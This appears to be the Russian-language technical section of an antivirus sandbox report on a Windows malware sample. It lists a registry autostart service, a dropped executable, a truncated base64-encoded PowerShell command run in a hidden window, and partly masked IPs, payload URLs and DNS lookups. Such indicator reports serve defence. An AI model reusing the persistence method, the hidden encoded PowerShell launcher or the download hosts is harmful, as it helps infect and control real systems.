Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\pidgenx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pidgenx] 'ImagePath' = '"<SYSTEM32>\defaultlocationcpl\pidgenx.exe"'
- 'pidgenx' "<SYSTEM32>\defaultlocationcpl\pidgenx.exe"
- 'pidgenx' <SYSTEM32>\defaultlocationcpl\pidgenx.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...
- %HOMEPATH%\99.exe
- <SYSTEM32>\defaultlocationcpl\pidgenx.exe
- %HOMEPATH%\99.exe в <SYSTEM32>\defaultlocationcpl\pidgenx.exe
- '20#.#12.78.182':80
- '74.##7.230.187':8080
- http://st####rsecurity.com/wp-includes/PTyoVOEIY/
- http://74.###.230.187:8080/9EGDKEmIjMJFV/C5JKqVnxcy7n30qm/ via 74.##7.230.187
- DNS ASK sc####na.education
- DNS ASK ma##i.site
- DNS ASK ma##.work
- DNS ASK bl##.##ngjieyuan.com
- DNS ASK st####rsecurity.com
- '%HOMEPATH%\99.exe'
- '<SYSTEM32>\defaultlocationcpl\pidgenx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGUAaQBwAHQAbwBlAHQAaABmAG8AaQB3AGwAZQBlAHkAYgB1AGsAPQAnAHAAYQBpAHQAZwBpAHIAdABoAGEAZABnAGEAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAF...' (со скрытым окном)